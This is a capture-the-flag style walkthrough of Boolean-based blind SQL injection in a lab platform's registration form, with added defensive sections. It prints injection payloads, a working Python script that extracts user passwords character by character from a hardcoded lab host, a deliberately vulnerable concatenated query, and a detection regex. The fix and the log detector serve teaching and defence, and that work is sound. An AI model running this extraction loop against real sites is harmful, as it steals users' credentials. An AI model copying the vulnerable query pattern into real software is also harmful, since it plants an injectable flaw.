Infinity - SQL Injection - Username

A walkthrough of exploiting Boolean-based SQL Injection in a registration form on Infinity platform. By crafting true/false conditions and automating character extraction with Python, we recovered user passwords from the database.


Vulnerability: Boolean-based SQL Injection


Step 1: Identify the Input Field

Open the challenge and locate the Login form input field.


Step 2: Test for SQL Injection

I tried the username admin and it was already taken. Injecting ', " and ` produced no error, so I moved on to Boolean-based testing:

First, let's imagine the SQL query behind the availability check:

SELECT * FROM users WHERE (username = 'username')

To inject into the username field I need to close the string and the parenthesis with ') and then append a new condition such as AND 1=1:

The responses show this is Boolean-based SQLi:

When the injected condition is false (1=2), the page says the username is available; when it is true (1=1), it says the username is already taken. The application's response therefore reflects the truth of our condition, which is exactly what Boolean-based blind SQLi needs. From here we can inject more complex conditions to retrieve the password length and then the password itself.
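The query above is an inference; the challenge's real code is not shown. As an added example (not the Infinity platform's code), the following script rebuilds the availability check two ways over a constructed in-memory SQLite table: once by concatenating the username into the SQL text, which is the flaw this walkthrough exploits, and once with a bound parameter. It then feeds both versions the true/false payloads from this step plus the SUBSTR payload from the next one and returns each version's answer, so the difference in behaviour is visible. The table, users, passwords and message strings are all constructed for the demo.

```python
#!/usr/bin/env python3
"""Added example: the registration username check as the post infers it,
built vulnerably and safely. The table, rows, passwords and the two
message strings are constructed for this demo, not the challenge's code."""
import sqlite3

TAKEN = "Username already exists"
AVAILABLE = "Username is available"


def make_db():
    # Constructed sample data; the real challenge database is unknown.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("admin", "s3cret9"), ("priya", "qwerty12")],
    )
    return conn


def check_username_vulnerable(conn, username):
    # String formatting: the input becomes part of the SQL text, so a
    # closing quote-and-paren in the username rewrites the WHERE clause and
    # whatever follows it is evaluated against the admin row.
    query = f"SELECT * FROM users WHERE (username = '{username}')"
    row = conn.execute(query).fetchone()
    return TAKEN if row else AVAILABLE


def check_username_safe(conn, username):
    # Parameterised query: the driver binds the whole input as one string
    # value. Quotes and keywords inside it are compared literally, never
    # parsed, so no condition the attacker writes is ever evaluated.
    query = "SELECT * FROM users WHERE (username = ?)"
    row = conn.execute(query, (username,)).fetchone()
    return TAKEN if row else AVAILABLE


def demo():
    """Run the walkthrough's payload shapes through both implementations."""
    conn = make_db()
    true_cond = "admin') AND 1=1 AND ('1'='1"
    false_cond = "admin') AND 1=2 AND ('1'='1"
    # Character oracle from Step 3; 's' is the first char of the constructed
    # admin password, so the condition is true against this demo table.
    substr_cond = "admin') AND SUBSTR(password,1,1)='s' AND ('1'='1"
    return {
        "vuln_true": check_username_vulnerable(conn, true_cond),
        "vuln_false": check_username_vulnerable(conn, false_cond),
        "vuln_substr": check_username_vulnerable(conn, substr_cond),
        "safe_true": check_username_safe(conn, true_cond),
        "safe_false": check_username_safe(conn, false_cond),
        "safe_substr": check_username_safe(conn, substr_cond),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name:12s} -> {result}")
```

The vulnerable version answers "taken" or "available" depending on the injected condition, which is the oracle the rest of the walkthrough relies on; the parameterised version answers "available" for every payload because no user is literally named that string. Binding parameters removes the whole class of problem, whereas filtering quotes would only remove the specific payloads shown here.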


Step 3: Retrieve the Password Length

Using the LENGTH function we can find the password length: if the response says the username is available, the guessed length is wrong; if it says the username is already taken, the guessed length is correct.

Now that the password length is known, the password can be extracted one character at a time. The character-extraction payload is admin') AND SUBSTR(password,1,1)='a' AND ('1'='1. Doing this by hand is tedious, so I wrote a Python script that tries the characters a-z and 0-9 at every position:

#!/usr/bin/env python3

import requests

url = "http://173.208.132.134:30238"
mark = "Username already exists"  # marker to know whether the user exists
chars = "abcdefghijklmnopqrstuvwxyz1234567890"
username = "admin"  # change this to extract another user's password (e.g. priya)

length = int(input("Password length: "))

password = ""
session = requests.Session()  # reuse one connection for the many requests

for i in range(1, length + 1):
    for c in chars:
        # Boolean condition: true only when character i of the password is c
        payload = f"{username}') AND SUBSTR(password,{i},1)='{c}' AND ('1'='1"

        response = session.post(
            url,
            data={"username": payload},
            timeout=10,
        )

        if mark in response.text:
            password += c
            print(f"[+] {i}: {c} -> {password}")
            break
    else:
        # No character in `chars` matched at this position: the password
        # contains a character outside a-z0-9, so extend `chars` and rerun
        print(f"[-] {i}: no match in charset")
        password += "?"

print(f"\nRecovered password: {password}")

The script recovered the password correctly.

For the user priya, change the username in the script and run it again:
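From the defender's side, the script above leaves a distinctive trace: a burst of registration attempts from one client whose username field contains a closing quote followed by AND/OR, or a SUBSTR/LENGTH call, with only one character changing between requests. As an added example (not part of the original post or of the Infinity platform), the following detector parses constructed application-log lines that record the submitted username, flags injection-shaped usernames while leaving a legitimate apostrophe alone, and reports per client whether the flagged requests arrived fast enough to suggest automation. The log format, field names, IPs and thresholds are all assumptions made for the demo.

```python
#!/usr/bin/env python3
"""Added example: detecting Boolean-based enumeration in registration logs.
The log format, field names, sample lines and thresholds are constructed
for this demo; real platforms log registration attempts differently."""
import re
from collections import defaultdict
from datetime import datetime

# Constructed application-log lines, one per registration attempt, with the
# submitted username quoted so the payload is visible to the detector.
SAMPLE_LOG = """\
2024-05-01T10:00:01 ip=203.0.113.7 path=/register username="alice" result=available
2024-05-01T10:00:02 ip=198.51.100.9 path=/register username="admin" result=taken
2024-05-01T10:00:02 ip=198.51.100.9 path=/register username="admin') AND LENGTH(password)=7 AND ('1'='1" result=taken
2024-05-01T10:00:03 ip=198.51.100.9 path=/register username="admin') AND SUBSTR(password,1,1)='a' AND ('1'='1" result=available
2024-05-01T10:00:03 ip=198.51.100.9 path=/register username="admin') AND SUBSTR(password,1,1)='b' AND ('1'='1" result=available
2024-05-01T10:00:03 ip=198.51.100.9 path=/register username="admin') AND SUBSTR(password,1,1)='s' AND ('1'='1" result=taken
2024-05-01T10:00:04 ip=203.0.113.7 path=/register username="o'brien" result=available
"""

LINE_RE = re.compile(
    r'^(?P<ts>\S+) ip=(?P<ip>\S+) path=(?P<path>\S+) '
    r'username="(?P<user>.*)" result=(?P<result>\w+)$'
)

# A quote or closing paren followed by a boolean operator, or a SQL function
# that reads column data: the shape of every payload in this walkthrough.
# A lone apostrophe (o'brien) does not match, which keeps false positives down.
INJECT_RE = re.compile(
    r"""['")]\s*(AND|OR)\b|\b(SUBSTR|SUBSTRING|LENGTH)\s*\(""", re.IGNORECASE
)


def parse_line(line):
    """Parse one constructed log line into a dict, or None if malformed."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.fromisoformat(rec["ts"])
    return rec


def is_injection_attempt(username):
    """True when the username has the quote-and-condition shape."""
    return INJECT_RE.search(username) is not None


def detect(log_text, burst_threshold=3, window_seconds=60):
    """Return per-IP findings: number of injection-shaped usernames sent and
    whether they arrived within one window, which suggests a script."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and is_injection_attempt(rec["user"]):
            events[rec["ip"]].append(rec["ts"])

    findings = {}
    for ip, times in events.items():
        times.sort()
        span = (times[-1] - times[0]).total_seconds()
        findings[ip] = {
            "attempts": len(times),
            "automated": len(times) >= burst_threshold and span <= window_seconds,
        }
    return findings


if __name__ == "__main__":
    for ip, info in detect(SAMPLE_LOG).items():
        print(f"{ip}: {info['attempts']} injection-shaped requests, "
              f"automated={info['automated']}")
```

The pattern match alone is a useful alert; the burst count is what separates a curious tester from the extraction loop in this post, which sends up to 36 requests per password character. Either signal is a reason to rate-limit the endpoint, but the real fix remains parameterising the query so the oracle does not exist.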

Key Takeaways

  • Always test ' and " first — even if no error appears, the app might still be vulnerable.
  • When there’s no visible output, look for behavioral differences — “username taken” vs “available” is enough to build a full attack on.
  • Automating character extraction with Python saves hours — manual SUBSTR testing is impractical on real passwords.

Happy Hacking!

Follow me: LinkedIn · X

This post is licensed under CC BY 4.0 by the author.